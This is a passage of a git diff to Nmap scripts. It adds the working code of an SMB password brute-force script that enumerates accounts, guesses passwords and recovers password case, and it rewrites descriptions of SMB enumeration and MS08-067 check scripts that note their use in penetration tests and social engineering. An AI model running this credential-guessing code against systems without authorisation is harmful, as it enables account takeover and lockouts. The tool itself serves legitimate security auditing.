+local function count_ones(num)
+	local count = 0
+
+	while num ~= 0 do
+		if(bit.band(num, 1) == 1) then
+			count = count + 1
+		end
+		num = bit.rshift(num, 1)
+	end
+
+	return count
+end
+
+---Converts a string's case based on a binary number. For every '1' bit, the character is uppercased, and for every '0'
+-- bit it's lowercased. For example, "test" and 8 (1000) becomes "Test", while "test" and 11 (1011) becomes "TeST". 
+--
+--@param str The string to convert.
+--@param num The binary number representing the case. This value isn't checked, so if it's too large it's truncated, and if it's
+--           too small it's effectively zero-padded. 
+--@return The converted string. 
+local function convert_case(str, num)
+	local pos = #str
+
+	-- Don't bother with blank strings (we probably won't get here anyway, but it doesn't hurt)
+	if(str == "") then
+		return ""
+	end
+
+	while(num ~= 0) do
+		-- Check if the bit we're at is '1'
+		if(bit.band(num, 1) == 1) then
+			-- Check if we're at the beginning or end (or both) of the string -- those are special cases
+			if(pos == #str and pos == 1) then
+				str = string.upper(string.sub(str, pos, pos))
+			elseif(pos == #str) then
+				str = string.sub(str, 1, pos - 1) .. string.upper(string.sub(str, pos, pos))
+			elseif(pos == 1) then
+				str = string.upper(string.sub(str, pos, pos)) .. string.sub(str, pos + 1, #str)
+			else
+				str = string.sub(str, 1, pos - 1) .. string.upper(string.sub(str, pos, pos)) .. string.sub(str, pos + 1, #str)
+			end
+		end
+
+		num = bit.rshift(num, 1)
+
+		pos = pos - 1
+	end
+
+	return str
+end
+
+---Attempts to determine the case of a password. This is done by trying every possible combination of upper and lowercase
+-- characters in the password, in the most efficient possible ordering, until the corerct case is found. 
+--
+-- A session has to be active when this function is called. 
+--
+--@param hostinfo The hostinfo table. 
+--@param username The username. 
+--@param password The password (it's assumed that it's all lowercase already, but it doesn't matter)
+--@return The password with the proper case, or the original password if it couldn't be determined (either the proper
+--        case wasn't found or the login type is incorrect). 
+local function find_password_case(hostinfo, username, password)
+	-- Only do this if we're using lanman, otherwise we already have the proper password
+	if(get_type(hostinfo) ~= "lm") then
+		return password
+	end
+
+	-- Figure out how many possibilities exist
+	local max = math.pow(2, #password) - 1
+
+	-- Create an array of them, starting with all the values whose binary representation has no ones, then one one, then two ones, etc.
+	local ordered = {}
+
+	-- Cheat a bit, by adding all lower then all upper right at the start
+	ordered = {0, max}
+
+	-- Loop backwards from the length of the password to 0. At each spot, put all numbers that have that many '1' bits
+	for i = 1, #password - 1, 1 do
+		for j = max, 0, -1 do
+			if(count_ones(j) == i) then
+				table.insert(ordered, j)
+			end
+		end
+	end
+
+	-- Create the list of converted passwords
+	for i = 1, #ordered, 1 do
+		local thispassword = convert_case(password, ordered[i])
+
+		-- We specify "ntlm" for the login type because it's case sensitive
+		local result = check_login(hostinfo, username, thispassword, 'ntlm')
+		if(is_positive_result(hostinfo, result)) then
+			return thispassword
+		end
+	end
+
+	-- Print an error message
+	stdnse.print_debug(1, "ERROR: smb-brute: Was unable to determine case of %s's password", username)
+
+	-- If all else fails, just return the actual password (we probably shouldn't get here)
+	return password
+end
+
+---Initializes and returns the hostinfo table. This includes queuing up the username and password lists, determining
+-- the server's operating system,  and checking the server's response for invalid usernames/invalid passwords. 
+--
+--@param host The host object. 
+local function initialize(host)
+	local os, result
+	local hostinfo = {}
+	hostinfo['host'] = host
+	hostinfo['invalid_usernames'] = {}
+	hostinfo['locked_usernames'] = {}
+	hostinfo['accounts'] = {}
+	hostinfo['special_password'] = 1
+
+	-- Get the OS (identifying windows versions tells us which hash to use)
+	result, os = smb.get_os(host)
+	if(result == false) then
+		hostinfo['os'] = "<Unknown>"
+	else
+		hostinfo['os'] = os['os']
+	end
+	stdnse.print_debug(1, "smb-brute: Remote operating system: %s", hostinfo['os'])
+
+	-- Attempt to enumerate users
+	stdnse.print_debug(1, "smb-brute: Trying to get user list from server")
+	hostinfo['have_user_list'], _, hostinfo['user_list'] = msrpc.get_user_list(host)
+	hostinfo['user_list_index'] = 1
+	if(hostinfo['have_user_list'] and #hostinfo['user_list'] == 0) then
+		hostinfo['have_user_list'] = false
+	end
+
+	-- If the enumeration failed, try using the built-in list
+	if(not(hostinfo['have_user_list'])) then
+		stdnse.print_debug(1, "smb-brute: Couldn't enumerate users (normal for Windows XP and higher), using unpwdb initially")
+		status, hostinfo['user_list_default'] = unpwdb.usernames()
+		if(status == false) then
+			return false, "Couldn't open username file"
+		end
+	end
+
+	-- Open the password file
+	stdnse.print_debug(1, "smb-brute: Opening password list")
+	status, hostinfo['password_list'] = unpwdb.passwords()
+	if(status == false) then
+		return false, "Couldn't open password file"
+	end
+
+	-- Start the SMB session
+	stdnse.print_debug(1, "smb-brute: Starting the initial SMB session")
+	status, err = restart_session(hostinfo)
+	if(status == false) then
+		stop_session(hostinfo)
+		return false, err
+	end
+
+	-- Some hosts will accept any username -- check for this by trying to log in with a totally random name. If the 
+	-- server accepts it, it'll be impossible to bruteforce; if it gives us a weird result code, we have to remember
+	-- it. 
+	hostinfo['invalid_username'] = check_login(hostinfo, get_random_string(8), get_random_string(8), "ntlm")
+	hostinfo['invalid_password'] = check_login(hostinfo, "Administrator",      get_random_string(8), "ntlm")
+
+	stdnse.print_debug(1, "smb-brute: Server's response to invalid usernames: %s", result_short_strings[hostinfo['invalid_username']])
+	stdnse.print_debug(1, "smb-brute: Server's response to invalid passwords: %s", result_short_strings[hostinfo['invalid_password']])
+
+	-- If either of these comes back as success, there's no way to tell what's valid/invalid
+	if(hostinfo['invalid_username'] == results.SUCCESS) then
+		stop_session(hostinfo)
+		return false, "Invalid username was accepted; unable to bruteforce"
+	end
+	if(hostinfo['invalid_password'] == results.SUCCESS) then
+		stop_session(hostinfo)
+		return false, "Invalid password was accepted; unable to bruteforce"
+	end
+
+	-- Print a message to the user if we can identify passwords
+	if(hostinfo['invalid_username'] ~= hostinfo['invalid_password']) then
+		stdnse.print_debug(1, "smb-brute: Invalid username and password response are different, so identifying valid accounts is possible")
+	end
+
+	-- Print a warning message if invalid_username and invalid_password go to the same thing that isn't FAIL
+	if(hostinfo['invalid_username'] ~= results.FAIL and hostinfo['invalid_username'] == hostinfo['invalid_password']) then
+		stdnse.print_debug(1, "smb-brute: WARNING: Difficult to recognize invalid usernames/passwords; may not get good results")
+	end
+
+	-- Restart the SMB connection so we have a clean slate
+	stdnse.print_debug(1, "smb-brute: Restarting the session before the bruteforce")
+	status, err = restart_session(hostinfo)
+	if(status == false) then
+		stop_session(hostinfo)
+		return false, err
+	end
+
+	-- Stop the SMB session (we're going to let the scripts look after their own sessions)
+	stop_session(hostinfo)
+
+	-- Return the results
+	return true, hostinfo
+end
+
+---Retrieves the next password in the password database we're using. Will never return the empty string.
+-- May also return one of the <code>special_passwords</code> constants. 
+--
+--@param hostinfo The hostinfo table (the password list is stored there). 
+--@return The new password, or nil if the end of the list has been reached. 
+local function get_next_password(hostinfo)
+	local new_password
+
+	-- If we're out of special passwords, move onto actual ones
+	if(hostinfo['special_password'] > #special_passwords) then
+		-- Pick the next non-blank password from the list
+		repeat
+			new_password = hostinfo['password_list']()
+		until new_password ~= ''
+	else
+		-- Get the next non-blank password
+		new_password = special_passwords[hostinfo['special_password']]
+		hostinfo['special_password'] = hostinfo['special_password'] + 1
+	end
+
+	return new_password
+end
+
+---Reset to the first password. This is normally done when the user list changes. 
+--
+--@param hostinfo The hostinfo table. 
+local function reset_password(hostinfo)
+	hostinfo['password_list']("reset")
+end
+
+---Retrieves the next username. This can be from the username database, or from an array stored in the
+-- hostinfo table. This won't return any names that have been determined to be invalid, locked, or 
+-- have already had their password found. 
+--
+--@param hostinfo The hostinfo table
+--@return The next username, or nil if the end of the list has been reached. 
+local function get_next_username(hostinfo)
+	local username
+
+	repeat
+		if(hostinfo['have_user_list']) then
+			local index = hostinfo['user_list_index']
+			hostinfo['user_list_index'] = hostinfo['user_list_index'] + 1
+	
+			username = hostinfo['user_list'][index]
+			if(username ~= nil) then
+				_, username = split_domain(username)
+			end
+	
+		else
+			username = hostinfo['user_list_default']()
+		end
+
+		-- Make the username lowercase (usernames aren't case sensitive, so making it lower case prevents duplicates)
+		if(username ~= nil) then
+			username = string.lower(username)
+		end
+
+	until username == nil or (hostinfo['invalid_usernames'][username] ~= true and hostinfo['locked_usernames'][username] ~= true and hostinfo['accounts'][username] == nil)
+
+	return username
+end
+
+---Reset to the first username. 
+--
+--@param hostinfo The hostinfo table. 
+local function reset_username(hostinfo)
+	if(hostinfo['have_user_list']) then
+		hostinfo['user_list_index'] = 1
+	else
+		hostinfo['user_list_default']("reset")
+	end
+end
+
+---Do a little trick to detect account lockouts without bringing every user to the lockout threshold -- bump the lockout counter of 
+-- the first user ahead. If lockouts are happening, this means that the first account will trigger before the rest of the accounts. 
+-- A canary in the mineshaft, in a way.
+--
+-- The number of checks defaults to three, but it can be controlled with the <code>canary</code> argument. 
+--
+-- Times it'll fail are when:
+-- * Accounts are locked out due to the initial checks (happens if the user runs smb-brute twice in a row, the canary won't help)
+-- * A valid user list isn't pulled, and we create a canary that doesn't exist (won't be as bad, though, because it means we also
+--   don't have every account on the server/domain
+function test_lockouts(hostinfo)
+	local i
+	local username = get_next_username(hostinfo)
+
+	-- It's possible that every username was accounted for already, so our list is empty. 
+	if(username == nil) then
+		return 
+	end
+
+	if(nmap.registry.args.smblockout == 1 or nmap.registry.args.smblockout == "true") then
+		return
+	end
+
+	while(string.lower(username) == "administrator") do
+		username = get_next_username(hostinfo)
+		if(username == nil) then
+			return
+		end
+	end
+
+	if(username ~= nil) then
+		-- Try logging in as the "canary" account
+		local canaries = nmap.registry.args.canaries
+		if(canaries == nil) then
+			canaries = 3
+		else
+			canaries = tonumber(canaries)
+		end
+
+		if(canaries > 0) then
+			stdnse.print_debug(1, "smb-brute: Detecting server lockout on '%s' with %d canaries", username, canaries)
+		end
+
+		for i=1, canaries, 1 do
+			result = check_login(hostinfo, username, get_random_string(8), "ntlm")
+		end
+
+		-- If the account just became locked (it's already been put on the 'valid' list), we're in trouble
+		if(result == results.LOCKED) then
+			-- If the canary just became locked, we're one step from locking out every account. Loop through the usernames and invalidate them to 
+			-- prevent them from being locked out
+			stdnse.print_debug(1, "smb-brute: Canary (%s) became locked out -- aborting")
+
+			-- Add it to the locked username list (so it can be reported)
+			hostinfo['locked_usernames'][username] = true
+
+			-- Mark all the usernames as invalid (a bit of a hack, but it's safer this way)
+			while(username ~= nil) do
+				stdnse.print_debug(1, "smb-brute: Marking '%s' as 'invalid'", username)
+				hostinfo['invalid_usernames'][username] = true
+				username = get_next_username(hostinfo)
+			end
+		end
+	end
+
+	-- Go back to the beginning of the list
+	reset_username(hostinfo)
+end
+
+---Attempts to validate the current list of usernames by logging in with a blank password, marking invalid ones (and ones that had
+-- a blank password). Determining the validity of a username works best if invalid usernames are redirected to 'guest'. 
+--
+-- If a username accepts the blank password, a random password is tested. If that's accepted as well, the account is marked as 
+-- accepting any password (the 'guest' account is normally like that). 
+--
+-- This also checks whether the server locks out users, and raises the lockout threshold of the first user (see the 
+-- <code>check_lockouts</code> function for more information on that. If accounts on the system are locked out, they aren't
+-- checked. 
+--
+--@param hostinfo The hostinfo table. 
+--@return (status, err) If status is false, err is a string corresponding to the error; otherwise, err is undefined. 
+local function validate_usernames(hostinfo)
+	local status, err
+	local result
+	local username, password
+
+	stdnse.print_debug(1, "smb-brute: Checking which account names exist (based on what goes to the 'guest' account)")
+
+	-- Start a session
+	status, err = restart_session(hostinfo)
+	if(status == false) then
+		return false, err
+	end
+
+	-- Make sure we start at the beginning
+	reset_username(hostinfo)
+
+	username = get_next_username(hostinfo)
+	while(username ~= nil) do
+		result = check_login(hostinfo, username, "", "ntlm")
+
+		if(result ~= hostinfo['invalid_password'] and result == hostinfo['invalid_username']) then
+			-- If the account matches the value of 'invalid_username', but not the value of 'invalid_password', it's invalid
+			stdnse.print_debug(1, "smb-brute: Blank password for '%s' -> '%s' (invalid account)", username, result_short_strings[result])
+			hostinfo['invalid_usernames'][username] = true
+
+		elseif(result == hostinfo['invalid_password']) then
+
+			-- If the account matches the value of 'invalid_password', and 'invalid_password' is reliable, it's probably valid
+			if(hostinfo['invalid_username'] ~= results.FAIL and hostinfo['invalid_username'] == hostinfo['invalid_password']) then
+				stdnse.print_debug(1, "smb-brute: Blank password for '%s' => '%s' (can't determine validity)", username, result_short_strings[result])
+			else
+				stdnse.print_debug(1, "smb-brute: Blank password for '%s' => '%s' (probably valid)", username, result_short_strings[result])
+			end
+
+		elseif(result == results.ACCOUNT_LOCKED) then
+			-- If the account is locked out, don't try it
+			hostinfo['locked_usernames'][username] = true
+			stdnse.print_debug(1, "smb-brute: Blank password for '%s' => '%s' (locked out)", username, result_short_strings[result])
+
+		elseif(result == results.FAIL) then
+			-- If none of the standard options work, check if it's FAIL. If it's FAIL, there's an error somewhere (probably, the 
+			-- 'administrator' username is changed so we're getting invalid data). 
+			stdnse.print_debug(1, "smb-brute: Blank password for '%s' => '%s' (may be valid)", username, result_short_strings[result])
+
+		else
+			-- If none of those came up, either the password is legitimately blank, or any account works. Figure out what! 
+			local new_result = check_login(hostinfo, username, get_random_string(14), "ntlm")
+			if(new_result == result) then
+				-- Any password works (often happens with 'guest' account)
+				stdnse.print_debug(1, "smb-brute: All passwords accepted for %s (goes to %s)", username, result_short_strings[result])
+				status, err = found_account(hostinfo, username, "<anything>", result)
+				if(status == false) then
+					return false, err
+				end
+			else
+				-- Blank password worked, but not random one
+				status, err = found_account(hostinfo, username, "", result)
+				if(status == false) then
+					return false, err
+				end
+			end
+		end
+
+		username = get_next_username(hostinfo)
+	end
+
+	-- Start back at the beginning of the list
+	reset_username(hostinfo)
+
+	-- Check for lockouts
+	test_lockouts(hostinfo)
+
+	-- Stop the session
+	stop_session(hostinfo)
+
+	return true
+end
+
+---Marks an account as discovered. The login with this account doesn't have to be successful, but <code>is_positive_result</code> should
+-- return <code>true</code>. 
+--
+-- If the result IS successful, and this hasn't been done before, this function will attempt to pull a userlist from the server. 
+--
+-- The session should be stopped before entering this function, and restarted after -- that allows this function to make its own SMB calls. 
+--
+--@param hostinfo The hostinfo table. 
+--@param username The username. 
+--@param password The password.
+--@param result   The result, as an integer constant. 
+--@return (status, err) If status is false, err is a string corresponding to the error; otherwise, err is undefined. 
+function found_account(hostinfo, username, password, result)
+	local status, err
+
+	-- Save the username
+	hostinfo['accounts'][username] = {}
+	hostinfo['accounts'][username]['password'] = password
+	hostinfo['accounts'][username]['result']   = result
+
+	-- Save the account (smb will automatically decide if it's better than the account it already has)
+	if(result == results.SUCCESS) then
+		-- Stop the connection -- this lets us do some queries
+		status, err = stop_session(hostinfo)
+		if(status == false) then
+			return false, err
+		end
+
+		smb.add_account(hostinfo['host'], username, password)
+
+		-- If we haven't retrieved the real user list yet, do so
+		if(hostinfo['have_user_list'] == false) then
+			-- Attempt to enumerate users
+			stdnse.print_debug(1, "smb-brute: Trying to get user list from server using newly discovered account")
+			hostinfo['have_user_list'], _, hostinfo['user_list'] = msrpc.get_user_list(hostinfo['host'])
+			hostinfo['user_list_index'] = 1
+			if(hostinfo['have_user_list'] and #hostinfo['user_list'] == 0) then
+				hostinfo['have_user_list'] = false
+			end
+
+			-- If the list was found, let the user know and reset the password list
+			if(hostinfo['have_user_list']) then
+				stdnse.print_debug(1, "smb-brute: Found %d accounts to check!", #hostinfo['user_list'])
+				reset_password(hostinfo)
+
+				-- Validate them (pick out the ones that can't possibly log in)
+				validate_usernames(hostinfo)
+			end
+		end
+
+		-- Start the session again
+		status, err = restart_session(hostinfo)
+		if(status == false) then
+			return false, err
+		end
+		
+	end
+end
+
+---This is the main function that does all the work (loops through the lists and checks the results). 
+--
+--@param host The host table. 
+--@return (status, accounts, locked_accounts) If status is false, accounts is an error message. Otherwise, accounts
+--        is a table of passwords/results, indexed by the username and locked_accounts is a table indexed by locked
+--        usernames. 
+local function go(host)
+	local status, err
+	local result, hostinfo
+	local password, temp_password, username
+	local response = {}
+
+	-- Initialize the hostinfo object, which sets up the initial variables
+	result, hostinfo = initialize(host)
+	if(result == false) then
+		return false, hostinfo
+	end
+
+	-- If invalid accounts don't give guest, we can determine the existence of users by trying to 
+	-- log in with an invalid password and checking the value
+	status, err = validate_usernames(hostinfo)
+	if(status == false) then
+		return false, err
+	end
+
+	-- Start up the SMB session
+	status, err = restart_session(hostinfo)
+	if(status == false) then
+		return false, err
+	end
+
+	-- Loop through the password list
+	temp_password = get_next_password(hostinfo)
+	while(temp_password ~= nil) do
+		-- Loop through the user list
+		username = get_next_username(hostinfo)
+		while(username ~= nil) do
+			-- Check if it's a special case (we do this every loop because special cases are often
+			-- based on the username
+			if(temp_password == USERNAME) then
+				password = username
+--io.write(string.format("Trying matching username/password (%s:%s)\n", username, password))
+			elseif(temp_password == USERNAME_REVERSED) then
+				password = string.reverse(username)
+--io.write(string.format("Trying reversed username/password (%s:%s)\n", username, password))
+			else
+				password = temp_password
+			end
+
+--io.write(string.format("%s:%s\n", username, password))
+			local result = check_login(hostinfo, username, password, get_type(hostinfo))
+
+			if(is_positive_result(hostinfo, result)) then
+
+				-- First, the special case -- a lockout occurred (bad news!)
+				if(result == results.ACCOUNT_LOCKED) then
+					-- Add it to the list of locked usernames
+					hostinfo['locked_usernames'][username] = true
+
+					-- Unless the user requested to keep going, stop the check
+					if(not(nmap.registry.args.smblockout == 1 or nmap.registry.args.smblockout == "true")) then
+						-- Mark it as found, which is technically true
+						status, err = found_account(hostinfo, username, nil, results.ACCOUNT_LOCKED_NOW)
+						if(status == false) then
+							return err
+						end
+
+						-- Let the user know that it went badly
+						stdnse.print_debug(1, "smb-brute: '%s' became locked out; stopping", username)
+
+						return true, hostinfo['accounts'], hostinfo['locked_usernames']
+					else
+						stdnse.print_debug(1, "smb-brute: '%s' became locked out; continuing", username)
+					end
+				end
+
+				-- Reset the connection
+				stdnse.print_debug(2, "smb-brute: Found an account; resetting connection")
+				status, err = restart_session(hostinfo)
+				if(status == false) then
+					return false, err
+				end
+
+				-- Find the case of the password, unless it's a hash
+				if(not(#password == 32 or #password == 64 or #password == 65)) then
+					stdnse.print_debug(1, "smb-brute: Determining password's case (%s)", format_result(username, password))
+					case_password = find_password_case(hostinfo, username, password, result)
+					stdnse.print_debug(1, "smb-brute: Result: %s", format_result(username, case_password))
+				else
+					case_password = password
+				end
+
+				-- Take normal actions for finding an account
+				status, err = found_account(hostinfo, username, case_password, result)
+				if(status == false) then
+					return err
+				end
+			end
+			username = get_next_username(hostinfo)
+		end
+
+		reset_username(hostinfo)
+		temp_password = get_next_password(hostinfo)
+	end
+
+	stop_session(hostinfo)
+	return true, hostinfo['accounts'], hostinfo['locked_usernames']
+end
+
+--_G.TRACEBACK = TRACEBACK or {}
+action = function(host, port)
+--	TRACEBACK[coroutine.running()] = true;
+
+	local status, result
+	local response = " \n"
+
+	local username
+	local usernames = {}
+	local locked = {}
+	local i
+
+	status, result, locked_result = go(host)
+	if(status == false) then
+		if(nmap.debugging() > 0) then
+			return "ERROR: " .. result
+		else
+			return nil
+		end
+	end
+
+	-- Put the usernames in their own table
+	for username in pairs(result) do
+		table.insert(usernames, username)
+	end
+
+	-- Sort the usernames alphabetically
+	table.sort(usernames)
+
+	-- Display the usernames
+	if(#usernames == 0) then
+		response = "No accounts found\n"
+	else
+		for i=1, #usernames, 1 do
+			local username = usernames[i]
+			response = response .. format_result(username, result[username]['password'], result[username]['result']) .. "\n"
+		end
+	end
+
+	-- Make a list of locked accounts
+	for username in pairs(locked_result) do
+		table.insert(locked, username)
+	end
+	if(#locked > 0) then
+		-- Sort the list
+		table.sort(locked)
+
+		-- Display the list
+		response = response .. string.format("Locked accounts found: %s\n", stdnse.strjoin(", ", locked))
+	end
+
+	return response
+end
+
diff --git a/scripts/smb-check-vulns.nse b/scripts/smb-check-vulns.nse
index 7ef3fa94e..c1bf001e0 100644
--- a/scripts/smb-check-vulns.nse
+++ b/scripts/smb-check-vulns.nse
@@ -1,12 +1,18 @@
 description = [[
 Checks if a host is vulnerable to MS08-067, a Windows RPC vulnerability that
-can allow remote code execution. This script is intended to check for more
+can allow remote code execution. This script will be expanded to check for more
 vulnerabilities in the future.
 
 WARNING: These checks are dangerous, and are very likely to bring down a server. 
 These should not be run in a production environment unless you (and, more importantly,
 the business) understand the risks! 
 
+As a system administrator, performing these kinds of checks is crucial, because 
+a lot more damage can be done by a worm or a hacker using this vulnerability than
+by a scanner. Penetration testers, on the other hand, might not want to use this
+script -- crashing services is not generally a good way of sneaking through a 
+network. 
+
 If you set the script parameter 'unsafe', then scripts will run that are almost 
 (or totally) guaranteed to crash a vulnerable system; do NOT specify <code>unsafe</code>
 in a production environment! And that isn't to say that non-unsafe scripts will 
@@ -14,7 +20,7 @@ not crash a system, they're just less likely to.
 
 MS08-067 -- Checks if a host is vulnerable to MS08-067, a Windows RPC vulnerability that
 can allow remote code execution.  Checking for MS08-067 is very dangerous, as the check 
-is likelyto crash systems. On a fairly wide scan conducted by Brandon Enright, we determined
+is likely to crash systems. On a fairly wide scan conducted by Brandon Enright, we determined
 that on average, a vulnerable system is more likely to crash than to survive
 the check. Out of 82 vulnerable systems, 52 crashed. 
 
diff --git a/scripts/smb-enum-domains.nse b/scripts/smb-enum-domains.nse
index 55431b633..10eb854fe 100644
--- a/scripts/smb-enum-domains.nse
+++ b/scripts/smb-enum-domains.nse
@@ -1,5 +1,20 @@
 description = [[
-Attempts to enumerate domains on a system, along with their policies. This will likely only work without credentials against Windows 2000. 
+Attempts to enumerate domains on a system, along with their policies. This generally requires
+credentials, except against Windows 2000. In addition to the actual domain, the "Builtin" 
+domain is generally displayed. Windows returns this in the list of domains, but its policies 
+don't appear to be used anywhere. 
+
+Much of the information provided is useful to a penetration tester, because it tells the
+tester what types of policies to expect. For example, if passwords have a minimum length of 8, 
+the tester can trim his database to match; if the minimum length is 14, the tester will
+probably start looking for sticky notes on people's monitors. 
+
+Another useful piece of information is the password lockouts -- a penetration tester often wants
+to know whether or not there's a risk of negatively impacting a network, and this will 
+indicate it. The SID is displayed, which may be useful in other tools; the users are listed, 
+which uses different functions than <code>smb-enum-users.nse</code> (though likely won't 
+get different results), and the date and time the domain was created may give some insight into
+its history. 
 
 After the initial <code>bind</code> to SAMR, the sequence of calls is:
 * <code>Connect4</code>: get a connect_handle
diff --git a/scripts/smb-enum-processes.nse b/scripts/smb-enum-processes.nse
index ec467a2f8..91041a623 100644
--- a/scripts/smb-enum-processes.nse
+++ b/scripts/smb-enum-processes.nse
@@ -1,13 +1,19 @@
-
 description = [[
-Pulls a list of processes from the remote server over SMB (using the remote registry service and 
-HKEY_PERFORMANCE_DATA). 
+Pulls a list of processes from the remote server over SMB. This will determine
+all running processes, their process IDs, and their parent processes. It is done
+by querying the remote registry service, which is disabled by default on Vista; on 
+all other Windows versions, it requires Administrator privilges. 
 
-Requires Administrator access. 
+Since this requires administrator privileges, it isn't especially useful for a 
+penetration tester, since they can effectively do the same thing with metasploit
+or other tools. It does, however, provide for a quick way to get process lists 
+for a bunch of systems at the same time. 
 
-WARNING: I have experienced crashes in regsvc.exe while making registry calls against a fully patched Windows 
-2000 system; I've fixed the issue that caused it, but there's no guarantee that it (or a similar vuln in the
-same code) won't show up again.
+WARNING: I have experienced crashes in regsvc.exe while making registry calls 
+against a fully patched Windows 2000 system; I've fixed the issue that caused it,
+but there's no guarantee that it (or a similar vuln in the same code) won't show 
+up again. Since the process automatically restarts, it doesn't negatively impact 
+the system, besides showing a message box to the user. 
 ]]
 
 ---
@@ -34,48 +40,24 @@ same code) won't show up again.
 -- 
 -- --
 -- Host script results:
--- |  smb-enum-processes:   
--- |  Idle
--- |  | PID: 0, Parent: 0 [Idle]
--- |  | Priority: 0
--- |  |_Thread Count: 1, Handle Count: 0
--- |  System
--- |  | PID: 4, Parent: 0 [Idle]
--- |  | Priority: 8
--- |  |_Thread Count: 48, Handle Count: 392
--- |  VMwareUser
--- |  | PID: 212, Parent: 1832 [explorer]
--- |  | Priority: 8
--- |  |_Thread Count: 1, Handle Count: 45
--- |  VMwareTray
--- |  | PID: 240, Parent: 1832 [explorer]
--- |  | Priority: 8
--- |  |_Thread Count: 1, Handle Count: 41
--- |  smss
--- |  | PID: 252, Parent: 4 [System]
--- |  | Priority: 11
--- |  |_Thread Count: 3, Handle Count: 19
--- |  csrss
--- |  | PID: 300, Parent: 252 [smss]
--- |  | Priority: 13
--- |  |_Thread Count: 10, Handle Count: 347
--- |  winlogon
--- |  | PID: 324, Parent: 252 [smss]
--- |  | Priority: 13
--- |  |_Thread Count: 18, Handle Count: 513
--- |  services
--- |  | PID: 372, Parent: 324 [winlogon]
--- |  | Priority: 9
--- |  |_Thread Count: 17, Handle Count: 275
--- |  lsass
--- |  | PID: 384, Parent: 324 [winlogon]
--- |  | Priority: 9
--- |  |_Thread Count: 29, Handle Count: 415
--- |  logon.scr
--- |  | PID: 868, Parent: 324 [winlogon]
--- |  | Priority: 4
--- |  |_Thread Count: 1, Handle Count: 22
--- ...
+-- |  smb-enum-processes:  
+-- |  Idle [0] (parent: 0, priority: 0, threads: 1, handles: 0)
+-- |  System [8] (parent: 0, priority: 8, threads: 34, handles: 190)
+-- |  smss [140] (parent: 8, priority: 11, threads: 6, handles: 33)
+-- |  winlogon [160] (parent: 140, priority: 13, threads: 14, handles: 335)
+-- |  csrss [164] (parent: 140, priority: 13, threads: 10, handles: 229)
+-- |  services [212] (parent: 160, priority: 9, threads: 33, handles: 462)
+-- |  lsass [224] (parent: 160, priority: 9, threads: 13, handles: 267)
+-- |  SPOOLSV [412] (parent: 212, priority: 8, threads: 10, handles: 95)
+-- |  svchost [448] (parent: 212, priority: 8, threads: 24, handles: 369)
+-- |  mstask [516] (parent: 212, priority: 8, threads: 6, handles: 89)
+-- |  VMwareService.e [572] (parent: 212, priority: 13, threads: 4, handles: 95)
+-- |  winmgmt [648] (parent: 212, priority: 8, threads: 3, handles: 89)
+-- |  cmd [700] (parent: 212, priority: 8, threads: 1, handles: 28)
+-- |  explorer [720] (parent: 620, priority: 8, threads: 10, handles: 239)
+-- |  VMwareUser [748] (parent: 720, priority: 8, threads: 1, handles: 30)
+-- |  VMwareTray [764] (parent: 720, priority: 8, threads: 1, handles: 30)
+-- |_ regsvc [868] (parent: 212, priority: 8, threads: 4, handles: 76)
 -----------------------------------------------------------------------
 
 author = "Ron Bowes"
@@ -264,7 +246,7 @@ action = function(host)
 			end
 		end
 		response = ' \n' .. psl_print(psl)
-	elseif(nmap.verbosity() > 0) then
+	elseif(nmap.verbosity() > 1) then
 		for i = 1, #names, 1 do
 			local name = names[i]
 			if(name ~= '_Total') then
@@ -275,9 +257,7 @@ action = function(host)
 
 --				response = response .. string.format("%6d %24s (Parent: %24s, Priority: %4d, Threads: %4d, Handles: %4d)\n", process[name]['ID Process'], name, parent, process[name]['Priority Base'], process[name]['Thread Count'], process[name]['Handle Count'])
 
-				response = response .. string.format("%s [%d]\n", name, process[name]['ID Process'])
-				response = response .. string.format("| Parent: %s [%s]\n", process[name]['Creating Process ID'], parent)
-				response = response .. string.format("| Priority: %s, Thread Count: %s, Handle Count: %s\n", process[name]['Priority Base'], process[name]['Thread Count'], process[name]['Handle Count'])
+				response = response .. string.format("%s [%d] (parent: %s, priority: %s, threads: %s, handles: %s)\n", name, process[name]['ID Process'], process[name]['Creating Process ID'], process[name]['Priority Base'], process[name]['Thread Count'], process[name]['Handle Count'])
 			end
 			
 		end
diff --git a/scripts/smb-enum-sessions.nse b/scripts/smb-enum-sessions.nse
index 8a9bcf49d..4ba14830a 100644
--- a/scripts/smb-enum-sessions.nse
+++ b/scripts/smb-enum-sessions.nse
@@ -1,29 +1,42 @@
 description = [[
-Enumerates the users logged into a system either locally or through an SMB share.
+Enumerates the users logged into a system either locally or through an SMB share. The local users 
+can be logged on either physically on the machine, or through a terminal services session. 
+Connections to a SMB share are, for example, people connected to fileshares or making RPC calls. 
+Nmap's connection will also show up, and is generally identified by the one that connected "0 
+seconds ago". 
 
-Enumerating the local and terminal services users is done by reading the remote registry. Keys stored under
-<code>HKEY_USERS</code> are SIDs that represent the currently logged in users, and those SIDs can be converted
-to proper names by using the <code>lsar.LsaLookupSids</code> function. Doing this requires any access higher than
-anonymous. Guests, users, or administrators are all able to perform this request on the operating
-systems I (Ron Bowes) tested. 
+From the perspective of a penetration tester, the SMB Sessions is probably the most useful
+part of this program, especially because it doesn't require a high level of access. On, for 
+example, a file server, there might be a dozen or more users connected at the same time. Based 
+on the usernames, it might tell the tester what types of files are stored on the share. 
 
-Enumerating SMB connections is done using the <code>srvsvc.netsessenum</code> function, which returns who's
-logged in, when they logged in, and how long they've been idle for. Unfortunately, I couldn't find
-a way to get the user's domain with this function, so the domain isn't printed. The level of access
-required for this varies between Windows versions, but in Windows 2000 anybody (including the 
-anonymous account) can access this, and in Windows 2003 a user or administrator account is 
-required.
+Since the IP they're connected from and the account is revealed, the information here can also
+provide extra targets to test, as well as a username that's likely valid on that target. Additionally,
+since a strong username to ip correlation is given, it can be a boost to a social engineering 
+attack. 
 
-Since both of these are related to users being logged into the server, it seemed logical to combine
-them into a single script. 
+Enumerating the logged in users is done by reading the remote registry (and therefore won't 
+work against Vista, which disables it by default). Keys stored under <code>HKEY_USERS</code> are 
+SIDs that represent the connected users, and those SIDs can be converted to proper names by using 
+the <code>lsar.LsaLookupSids</code> function. Doing this requires any access higher than 
+anonymous; guests, users, or administrators are all able to perform this request on Windows 2000,
+XP, 2003, and Vista. 
 
-I learned the idea and technique for this from sysinternals' tool, PsLoggedOn.exe. I use similar
-function calls to what they use, so thanks go out to them. Thanks also to Matt Gardenghi, for requesting
-this script.
+Enumerating SMB connections is done using the <code>srvsvc.netsessenum</code> function, which 
+returns the usernames that are logged in, when they logged in, and how long they've been idle 
+for. The level of access required for this varies between Windows versions, but in Windows 
